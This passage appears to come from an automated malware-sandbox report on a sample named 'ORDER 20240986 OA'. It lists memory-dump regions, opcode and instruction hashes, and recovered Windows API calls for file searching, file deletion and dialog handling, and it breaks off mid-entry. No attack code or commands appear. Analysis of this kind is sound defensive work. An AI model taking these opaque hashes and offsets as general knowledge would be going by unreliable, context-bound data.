                                                                                                                                                  • Opcode Fuzzy Hash: c9fd6afbcb5828346a82c089bfbc9137f51634ca9dff74ed045c9ef063690ae8
                                                                                                                                                  • Instruction Fuzzy Hash: 0601D176608244DFCB159F64DC80B88BF71BF8A324F580296E9209B2E2C7308C14CB10
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2950680601.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_4_2_7610000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 0fd014d56a065e6242ebee0487c3f979755e686c81427196fa6a457945865dba
                                                                                                                                                  • Instruction ID: 4077601e40cbc79a5e8e074e5779f3dce665073ceccea920390bbfd7f66888e0
                                                                                                                                                  • Opcode Fuzzy Hash: 0fd014d56a065e6242ebee0487c3f979755e686c81427196fa6a457945865dba
                                                                                                                                                  • Instruction Fuzzy Hash: 53F058343001108FD7089B3ADD6892A37AAEFC8712B4880A9F90ACB7A0DE61DC018790
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2974233369.000000003AC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 3AC90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_4_2_3ac90000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 828228859f020a985c63fa29619ce0f88ca7fb1a8337d9cce3e40588473680ff
                                                                                                                                                  • Instruction ID: 53c2e8ae76ff4b5ba6dddb122aacf610658dbce1f5b6513f0298ccded60ef2a0
                                                                                                                                                  • Opcode Fuzzy Hash: 828228859f020a985c63fa29619ce0f88ca7fb1a8337d9cce3e40588473680ff
                                                                                                                                                  • Instruction Fuzzy Hash: 86F03A393002059FC7009F5AC484C9ABBEAFF8C7207558169EA0987331CB71AC55CB90
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2950756812.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_4_2_7660000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: d4123bd5a0a461d87a22894b29d3bbdff2d500df5e4a94f9d52f32f57b6ae838
                                                                                                                                                  • Instruction ID: 96e8bd902ca7272a4fd384a39889f8ef317e53bda17f0f52d0b2840e21b0813d
                                                                                                                                                  • Opcode Fuzzy Hash: d4123bd5a0a461d87a22894b29d3bbdff2d500df5e4a94f9d52f32f57b6ae838
                                                                                                                                                  • Instruction Fuzzy Hash: FDF09AB4D08349AFCB00DFA8D85599CBFF8AF87300F5090AAD858A7362E7305A54CF00
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2950756812.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_4_2_7660000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: a67c16ac44d848a8bda7f1c17f36c135cef8bba805ec728ce17936349a9d36a6
                                                                                                                                                  • Instruction ID: 393459b106988bacd021f93c60af87ae8c9479b9904bbe0ef0af8cf7d7d33338
                                                                                                                                                  • Opcode Fuzzy Hash: a67c16ac44d848a8bda7f1c17f36c135cef8bba805ec728ce17936349a9d36a6
                                                                                                                                                  • Instruction Fuzzy Hash: 54F03AB4D08249AFCB01DFB8D54999DBFF8AB86300F5090AAD855A7262E7345A54CB41
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2950756812.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_4_2_7660000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: b7f897440d3e7e2a5ed81863d872d2f13425ee10760df61f5da235d25ac04ebd
                                                                                                                                                  • Instruction ID: 4663b883107c983395adc6467addd60545fb0b14980d0cf463cd60f468c8ed9e
                                                                                                                                                  • Opcode Fuzzy Hash: b7f897440d3e7e2a5ed81863d872d2f13425ee10760df61f5da235d25ac04ebd
                                                                                                                                                  • Instruction Fuzzy Hash: 01F0B8B4D08208EFCB00DFA8D449A9CBFF4AB86300F0080EAD828A7362E7345A54CF01
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2950756812.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_4_2_7660000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: b02b1b6885fc4347e8f975766fe84b9c2bd52adc5fb5604cd1e76b9f8fdd8f5b
                                                                                                                                                  • Instruction ID: 53f03da33c375c2b64f53962fa1895f3a0b32fb4b0b3c85a74717186b15dde0d
                                                                                                                                                  • Opcode Fuzzy Hash: b02b1b6885fc4347e8f975766fe84b9c2bd52adc5fb5604cd1e76b9f8fdd8f5b
                                                                                                                                                  • Instruction Fuzzy Hash: 7FE065B8E04208EFCB00DFA9D446A9CBBF4EB89300F5080AAD829A3310E7349A54CF40
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2950756812.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_4_2_7660000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 059982aa58e88b5b19f259715517d7b2d72535e87815e87dd2265f2e11bf93eb
                                                                                                                                                  • Instruction ID: 41fd434e04840f62ebec8619adb309d4e1ba84443f3d053f81d4253f4f3b5dc7
                                                                                                                                                  • Opcode Fuzzy Hash: 059982aa58e88b5b19f259715517d7b2d72535e87815e87dd2265f2e11bf93eb
                                                                                                                                                  • Instruction Fuzzy Hash: BBE06DB4D04208EFCB00DFA9D5456DCBBF4EB45300F4081A99829A3350E7345A54CF41
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2950756812.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_4_2_7660000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 7d4846540994fa55cf2c472505d88e0b92eaa057f8dc13be75b5b8b66e62684a
                                                                                                                                                  • Instruction ID: 4a6b895f94cd80ea76390d05ce39249b993b7568007ae69a3d61d7c5047f7e39
                                                                                                                                                  • Opcode Fuzzy Hash: 7d4846540994fa55cf2c472505d88e0b92eaa057f8dc13be75b5b8b66e62684a
                                                                                                                                                  • Instruction Fuzzy Hash: A1E06DB4D0420CEFCB40DFA9D4456DDBBF4EB45300F5080A99829A3350E7345A54CF40
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2945076810.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_4_2_150000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 435ddf7004cc45b364117485752b3ec2666bb05c57d5f46918e622947cf60bcd
                                                                                                                                                  • Instruction ID: 0d80fd8b4771780449eee98ecce1162df215e41a2f7d92fcb90c9df75dcdb06c
                                                                                                                                                  • Opcode Fuzzy Hash: 435ddf7004cc45b364117485752b3ec2666bb05c57d5f46918e622947cf60bcd
                                                                                                                                                  • Instruction Fuzzy Hash: 04E0863140C3864FCB03EBB498D44897F36EF422147194595D4096B667DF742D998F51
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2945076810.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_4_2_150000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: b162d5508ab5883ae187a8734b317c907c2e2df937f13cf2db22dce910a61b29
                                                                                                                                                  • Instruction ID: 65796c6b09c89dcb44715985316754312f8fafbe344ea9273c532254887c604a
                                                                                                                                                  • Opcode Fuzzy Hash: b162d5508ab5883ae187a8734b317c907c2e2df937f13cf2db22dce910a61b29
                                                                                                                                                  • Instruction Fuzzy Hash: 17D05B31D2022B57CB10E7A5DC044EFF738FED6262B544626D51437154FB702659C6E1
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2945076810.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_4_2_150000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 3fc30e989736269f24f2960f3e8d279892f69499e47e3871f74777cdb0ef2980
                                                                                                                                                  • Instruction ID: fcd790d128d97fff00aef885bec8eb9319ed0c43d0ea09bdb9b40587f62554de
                                                                                                                                                  • Opcode Fuzzy Hash: 3fc30e989736269f24f2960f3e8d279892f69499e47e3871f74777cdb0ef2980
                                                                                                                                                  • Instruction Fuzzy Hash: 39D05B35E6022BC6CB11EBA1ED140FDB334BED5222B548617D53437164EB30165DC6A1
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2974233369.000000003AC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 3AC90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_4_2_3ac90000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 311e68538ff960cc4dd07e0c4e62a07b105f975a9b66c77b0074897c10eaefcc
                                                                                                                                                  • Instruction ID: 7308abc28d09e3cbdfcf80f2be3dc0c00245806357fb7874826759d68b356ab9
                                                                                                                                                  • Opcode Fuzzy Hash: 311e68538ff960cc4dd07e0c4e62a07b105f975a9b66c77b0074897c10eaefcc
                                                                                                                                                  • Instruction Fuzzy Hash: B6D0C7363441246B4B051B4994098EE7B7ED7C97717048126FD4993300CE794D1297D5
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2945076810.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_4_2_150000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: c3b494246c3c5ee1b22c82c0cc9c2a886a0d13fc4e7922467d32ca21f9a09470
                                                                                                                                                  • Instruction ID: e39fee5bf570151b8f35f5318c329e7393ae4166d761e9fa74112a0831ebfc05
                                                                                                                                                  • Opcode Fuzzy Hash: c3b494246c3c5ee1b22c82c0cc9c2a886a0d13fc4e7922467d32ca21f9a09470
                                                                                                                                                  • Instruction Fuzzy Hash: 92D04275E04109CBCB24DFA8E8844DCBB71EF89322B60546AD929A7651D63054958F11
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2945076810.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_4_2_150000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: b5999cbed7c3737d184992d810b56748e24f66577685eb4a32e492f74bfa5c10
                                                                                                                                                  • Instruction ID: 09a0fc2ab1c4fc9ddcdfb00d48981d9bb04999d0e7a0c82fc5216d89ffce7b1b
                                                                                                                                                  • Opcode Fuzzy Hash: b5999cbed7c3737d184992d810b56748e24f66577685eb4a32e492f74bfa5c10
                                                                                                                                                  • Instruction Fuzzy Hash: 68D0673AB400189FCB149F98EC809DDF776FB98221B148116EA15A3261C7319965DB60
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2945076810.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_4_2_150000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: b052b7a3156f0d662bec78fa483b815d3634de4f0129671f000a5a6085b81799
                                                                                                                                                  • Instruction ID: 925f6992b44364084da339f20cb1ee25870528b4e8dc80dff8f0255c721d4e8f
                                                                                                                                                  • Opcode Fuzzy Hash: b052b7a3156f0d662bec78fa483b815d3634de4f0129671f000a5a6085b81799
                                                                                                                                                  • Instruction Fuzzy Hash: 85C0123040430D4AC505FBA5EC95595773EE7803047409914B00D1766ADFB86DCA5ED1
                                                                                                                                                  APIs
                                                                                                                                                  • GetDlgItem.USER32(?,000003F9), ref: 00404C93
                                                                                                                                                  • GetDlgItem.USER32(?,00000408), ref: 00404C9E
                                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 00404CE8
                                                                                                                                                  • LoadBitmapW.USER32(0000006E), ref: 00404CFB
                                                                                                                                                  • SetWindowLongW.USER32(?,000000FC,00405273), ref: 00404D14
                                                                                                                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404D28
                                                                                                                                                  • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404D3A
                                                                                                                                                  • SendMessageW.USER32(?,00001109,00000002), ref: 00404D50
                                                                                                                                                  • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404D5C
                                                                                                                                                  • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404D6E
                                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 00404D71
                                                                                                                                                  • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404D9C
                                                                                                                                                  • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404DA8
                                                                                                                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E3E
                                                                                                                                                  • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404E69
                                                                                                                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E7D
                                                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00404EAC
                                                                                                                                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404EBA
                                                                                                                                                  • ShowWindow.USER32(?,00000005), ref: 00404ECB
                                                                                                                                                  • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404FC8
                                                                                                                                                  • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040502D
                                                                                                                                                  • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405042
                                                                                                                                                  • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405066
                                                                                                                                                  • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405086
                                                                                                                                                  • ImageList_Destroy.COMCTL32(?), ref: 0040509B
                                                                                                                                                  • GlobalFree.KERNEL32(?), ref: 004050AB
                                                                                                                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405124
                                                                                                                                                  • SendMessageW.USER32(?,00001102,?,?), ref: 004051CD
                                                                                                                                                  • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004051DC
                                                                                                                                                  • InvalidateRect.USER32(?,00000000,?), ref: 004051FC
                                                                                                                                                  • ShowWindow.USER32(?,00000000), ref: 0040524A
                                                                                                                                                  • GetDlgItem.USER32(?,000003FE), ref: 00405255
                                                                                                                                                  • ShowWindow.USER32(00000000), ref: 0040525C
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2945221064.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000004.00000002.2945200507.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000004.00000002.2945241945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000004.00000002.2945259440.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000004.00000002.2945380974.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                  • String ID: $M$N
                                                                                                                                                  • API String ID: 1638840714-813528018
                                                                                                                                                  • Opcode ID: d51f85f8d95834ec81a3e8aa82d4b0f7780387708cc2f6482410258e2394dffd
                                                                                                                                                  • Instruction ID: 9d148378a915bf423124f05431c6d1c5c5454a8af56f3bee09cc42272145c63f
                                                                                                                                                  • Opcode Fuzzy Hash: d51f85f8d95834ec81a3e8aa82d4b0f7780387708cc2f6482410258e2394dffd
                                                                                                                                                  • Instruction Fuzzy Hash: 59026EB0900209EFEB109F54DD85AAE7BB9FB85314F10817AF610BA2E1D7799E41CF58
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2950756812.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_4_2_7660000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: "$0oGp$LjGp$LjGp$LjGp$LjGp$LjGp$LjGp$LjGp$LjGp$PHdq$PHdq$PHdq$PHdq$PHdq$PHdq$PHdq$PHdq
                                                                                                                                                  • API String ID: 0-1726458773
                                                                                                                                                  • Opcode ID: 458519697353324da3dcfed572cc7a602d38fb10bb53ed0e1dbd18829b071945
                                                                                                                                                  • Instruction ID: 48c7dc6a135d226e01c8e9c334016854573aee2ed4bcf6029f9847d0221bcd21
                                                                                                                                                  • Opcode Fuzzy Hash: 458519697353324da3dcfed572cc7a602d38fb10bb53ed0e1dbd18829b071945
                                                                                                                                                  • Instruction Fuzzy Hash: 6E3280B4E00219CFDB64CFA9C998BDDBBB2BB89300F1081A9D909A7351DB755E85CF50
                                                                                                                                                  APIs
                                                                                                                                                  • DeleteFileW.KERNEL32(?,?), ref: 004059D2
                                                                                                                                                  • lstrcatW.KERNEL32(007A3F28,\*.*,007A3F28,?,?), ref: 00405A1A
                                                                                                                                                  • lstrcatW.KERNEL32(?,0040A014,?,007A3F28,?,?), ref: 00405A3D
                                                                                                                                                  • lstrlenW.KERNEL32(?,?,0040A014,?,007A3F28,?,?), ref: 00405A43
                                                                                                                                                  • FindFirstFileW.KERNEL32(007A3F28,?,?,?,0040A014,?,007A3F28,?,?), ref: 00405A53
                                                                                                                                                  • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405AF3
                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00405B02
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2945221064.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000004.00000002.2945200507.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000004.00000002.2945241945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000004.00000002.2945259440.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000004.00000002.2945380974.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                  • String ID: (?z$.$.$\*.*
                                                                                                                                                  • API String ID: 2035342205-1515725298
                                                                                                                                                  • Opcode ID: 055fc45d478fb46821b4c1b9f61a2cf5f882e22ca3136cc8209be43affe2ce83
                                                                                                                                                  • Instruction ID: 8b5db7531a0f4bb83586dba503ceccc8cbbd7972abfd892cd346515476ce1415
                                                                                                                                                  • Opcode Fuzzy Hash: 055fc45d478fb46821b4c1b9f61a2cf5f882e22ca3136cc8209be43affe2ce83
                                                                                                                                                  • Instruction Fuzzy Hash: 7D41D830900918A6CF21AB65CC89ABF7678EF82718F14827FF801B11C1D77C5985DE6E
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2950756812.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_4_2_7660000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: "$0oGp$PHdq$PHdq$PHdq$PHdq$PHdq$PHdq$PHdq$PHdq
                                                                                                                                                  • API String ID: 0-642543003
                                                                                                                                                  • Opcode ID: 44b9fc2a4a2e153b2536ddf862c871d2af9ff214815bec5ad4dcb87e66811500
                                                                                                                                                  • Instruction ID: 9ae051d99021c956b9988a981185fae60cd33fdc5ac11b8e4f1b523b0047d3ea
                                                                                                                                                  • Opcode Fuzzy Hash: 44b9fc2a4a2e153b2536ddf862c871d2af9ff214815bec5ad4dcb87e66811500
                                                                                                                                                  • Instruction Fuzzy Hash: 0412C2B4E012188FDB58CFA5C994BDDBBB2BF89300F1081A9D849AB361DB755E85CF50
                                                                                                                                                  APIs
                                                                                                                                                  • FindFirstFileW.KERNEL32(?,007A4F70,?,00401676,00000000), ref: 004065E5
                                                                                                                                                  • FindClose.KERNEL32(00000000,?,00401676,00000000), ref: 004065F1
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2945221064.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000004.00000002.2945200507.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000004.00000002.2945241945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000004.00000002.2945259440.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000004.00000002.2945380974.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Find$CloseFileFirst
                                                                                                                                                  • String ID: pOz
                                                                                                                                                  • API String ID: 2295610775-1820424874
                                                                                                                                                  • Opcode ID: e01e7619722b9f30efb83f7659fa0d40dd2a6717423703156fa95c420c1e82c9
                                                                                                                                                  • Instruction ID: b37c022bec08382a0cb03c9db181d2efdea8b1f21deeb05207148622359d6313
                                                                                                                                                  • Opcode Fuzzy Hash: e01e7619722b9f30efb83f7659fa0d40dd2a6717423703156fa95c420c1e82c9
                                                                                                                                                  • Instruction Fuzzy Hash: EFD01231519020AFC2001B38BD0C84B7A589F463307158B3AB4A6F11E4CB788C6296A9
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2950756812.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_4_2_7660000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: 0oGp
                                                                                                                                                  • API String ID: 0-2111374174
                                                                                                                                                  • Opcode ID: 89a2607346fcda80d9e1010dee09d9ea24943f84dc3aab7f5a50a3f38d008ee7
                                                                                                                                                  • Instruction ID: c097831f8de9251f81b522b398251462fe6e670bc1dc002dd0d0d7ae2cfcc52d
                                                                                                                                                  • Opcode Fuzzy Hash: 89a2607346fcda80d9e1010dee09d9ea24943f84dc3aab7f5a50a3f38d008ee7
                                                                                                                                                  • Instruction Fuzzy Hash: 9AB1A474E10218DFDB54DFA9C894A9DBBB2FF89310F1481A9D819AB365DB34AD41CF10
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2950756812.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_4_2_7660000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: 0oGp
                                                                                                                                                  • API String ID: 0-2111374174
                                                                                                                                                  • Opcode ID: 3a294e32b1f5a105faf7a0e8247cc69dd7102c43ffc03930b6fa36da5f97237d
                                                                                                                                                  • Instruction ID: 8d13d8dd8ecacd023bc6292ac809b5c0e9bdb4a69729348a2a2bf528d2e6db23
                                                                                                                                                  • Opcode Fuzzy Hash: 3a294e32b1f5a105faf7a0e8247cc69dd7102c43ffc03930b6fa36da5f97237d
                                                                                                                                                  • Instruction Fuzzy Hash: F5519775E00608DFDB08CFAAD584ADDBBF2BF89300F249169D419AB365D7349946CF10
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2950484955.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_4_2_7560000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 86fa84b0c3c378f7354ffe96f182a735264f85c0de64ae0428bc177ddaffa47c
                                                                                                                                                  • Instruction ID: 1e079bf8df7f2455d8b7001d49e012afd83f74330065d39f42f8eb2bb99e602b
                                                                                                                                                  • Opcode Fuzzy Hash: 86fa84b0c3c378f7354ffe96f182a735264f85c0de64ae0428bc177ddaffa47c
                                                                                                                                                  • Instruction Fuzzy Hash: 7DE1ADB4E01218CFDB64CFA9C994B9DBBB2BF89304F1081A9D908B7355DB355A86CF10
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2950484955.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_4_2_7560000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 6cf72dda402b1de301fa17742d1cbc03b5ac64aafcc27cb3895b1067c65819c0
                                                                                                                                                  • Instruction ID: b96afc60f9ebb5fe52c6397b3267c12b5d91aed8d9628b89f7c3caaee31a7d98
